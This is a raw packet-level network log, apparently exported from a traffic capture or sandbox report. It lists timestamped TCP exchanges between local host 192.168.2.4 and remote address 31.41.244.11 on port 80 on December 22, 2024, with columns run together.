                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.354882956 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.354896069 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.355237007 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.355582952 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.355653048 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.355691910 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.355700016 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.355736017 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.356681108 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.356733084 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.356774092 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.356779099 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.356815100 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.357314110 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.357415915 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.357451916 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.357462883 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.357495070 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.358207941 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.358355045 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.358391047 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.358401060 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.358434916 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.359095097 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.359186888 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.359222889 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.359235048 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.359265089 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.359973907 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.360089064 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.360125065 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.360136986 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.360165119 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.360852957 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.360959053 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.360997915 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.361005068 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.361041069 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.361923933 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.361963987 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.362030983 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.362066984 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.362112045 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.362631083 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.362675905 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.362746954 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.362782955 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.362832069 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.363524914 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.363569021 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.363632917 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.363668919 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.363712072 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.364415884 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.364516020 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.364551067 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.364561081 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.364593983 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.365287066 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.365406036 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.365442038 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.365453005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.365485907 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.366230965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.366313934 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.366314888 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.366349936 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.366384983 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.366416931 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.367060900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.367180109 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.367223978 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.367235899 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.367278099 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.367969990 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.368069887 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.368103981 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.368117094 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.368144989 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.368844032 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.368951082 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.368985891 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.368997097 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.369029045 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.369744062 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.369823933 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.369846106 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.369882107 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.369910002 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.369926929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.370641947 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.370747089 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.370783091 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.370795965 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.370830059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.371850014 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.371954918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.371992111 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.372004032 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.372034073 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.372397900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.372490883 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.372525930 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.372540951 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.372566938 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.373285055 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.373399973 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.373435020 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.373449087 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.373476028 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.374192953 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.374475002 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.374525070 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.374578953 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.374614954 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.374624968 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.374798059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.375359058 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.375456095 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.375492096 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.375505924 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.375534058 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.376240015 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.376353025 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.376388073 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.376399994 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.376430988 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.377166986 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.377242088 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.377276897 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.377290964 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.377319098 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.378025055 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.378134966 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.378170013 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.378181934 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.378211021 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.378902912 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.378952026 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.379020929 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.379056931 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.379101992 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.379793882 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.379836082 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.379904032 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.379940033 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.379981995 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.380692959 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.380738020 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.380805016 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.380841017 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.380886078 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.381560087 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.381686926 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.381689072 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.381726027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.381771088 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.382443905 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.382539034 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.382549047 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.382586002 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.382635117 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.382663012 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.389199018 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.389270067 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.389307022 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.389317036 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.389344931 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.389347076 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.389383078 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.389420033 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.389429092 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.389738083 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.390131950 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.390181065 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.390229940 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.546531916 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.546578884 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.546597004 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.546622038 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.546622992 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.546663046 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.547260046 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.547318935 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.547342062 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.547964096 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.549840927 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.549877882 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.549889088 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.549915075 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.549936056 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.549954891 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.549957037 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550012112 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550014973 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550048113 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550084114 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550096989 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550120115 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550157070 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550162077 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550218105 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550561905 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550611019 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550920963 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550957918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550983906 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.550996065 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.551614046 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.551829100 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.551865101 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.551878929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.551911116 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.552370071 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.552414894 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.552560091 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.552597046 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.552604914 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.552680969 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.553477049 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.553510904 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.553535938 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.553548098 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.553559065 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.553595066 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.554187059 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.554239988 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.554385900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.554420948 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.554471016 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.555121899 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.555181980 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.555298090 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.555358887 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.555408001 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.555855989 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.555907965 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.556195021 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.556231976 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.556245089 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.556322098 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.556912899 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.556967020 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.557018042 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.557068110 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.557173014 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.557805061 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.557840109 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.557876110 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.557888031 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.558012962 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.558696985 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.558733940 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.558747053 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.558770895 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.558777094 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.558816910 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.559585094 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.559619904 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.559655905 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.559663057 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.559684038 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.559701920 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.560311079 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.560517073 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.560518980 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.560563087 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.560570002 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.560601950 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.561398029 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.561434031 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:14.561445951 CET4976580192.168.2.431.41.244.11
